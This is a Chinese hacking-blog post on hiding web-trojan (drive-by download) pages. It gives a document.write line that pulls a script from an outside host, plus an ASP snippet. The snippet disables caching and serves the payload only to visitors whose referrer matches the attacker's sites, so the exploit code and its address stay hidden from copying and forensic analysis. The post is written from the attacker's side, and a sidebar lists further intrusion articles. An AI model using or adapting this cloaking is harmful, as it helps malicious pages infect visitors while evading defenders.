|
[推荐]网马的运行分析续篇
余弦不久之前写了网马中枢,是关于服务端应用的一小角,他还说有其他更复杂的应用,一直等着他的BLOG更新,还是未见他写出来。最近大家都很忙。
关于网马代码,exploit固然重要,但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ,读取文件等方式来隐藏EXP的地址,不过,EXP代码完全暴露出来了,那就无法阻止代码被剽窃,被取证等行为。
我已经很久没有写点什么了,就放一点服务端技术的应用和小注释吧。不是什么新技术,只是实现一些在现实中比较实用的东西,大牛赶紧飘过。
我们已经有了网马中枢了,那么,如何来隐藏我们的EXP代码以及地址呢?哈哈。这不难。跟着我的思路吧。
——————华丽地分割——————–
利用网马中枢提到的include ,读取文件这2个方式,已经可以隐藏了地址,在最后调用的HTM(last_trojan.html)写入以下代码:
| 以下是引用片段: document.write(”<script src=http://www.scanw.com/blog/done.asp></script>”); |
/*继续调用一个JS文件*/
在done.asp里写入以下代码:
| 以下是引用片段: <% Response.Buffer = True Response.ExpiresAbsolute = Now() - 1 Response.Expires = 0 Response.CacheControl = “no-cache” Response.AddHeader “Pragma”, “No-Cache” Dim hr hr=Request.ServerVariables(”HTTP_REFERER”) If InStr(hr,”greysign”) > 0 or InStr(hr,”scanw”) > 0 Then %> alert(’aaa’) <% End If %> |
这个代码的作用是:打开缓存,将页面设置为立即过期,Now() - 1设置不留缓存文件,这样可以在用户点后退的时候没有缓存文件可以查看,变成直接的HTTP请求,然后获取HTTP_REFERER,判断 HTTP_REFERER来源玉米是否带有我们的字符串(即判断来源网站是否是我们的网站),假如包含字符串,就执行alert(’aaa’),假如不包 含(不是来自我们的网站的连接请求),那么就什么都不返回执行。
结合以上的所有手段,我们就实现了地址隐藏和代码隐藏了。
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| sqlserver2005中恢复xp_cmdshell | 11-10 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |
| bat 延时执行命令 | 10-09 |
您现在的位置: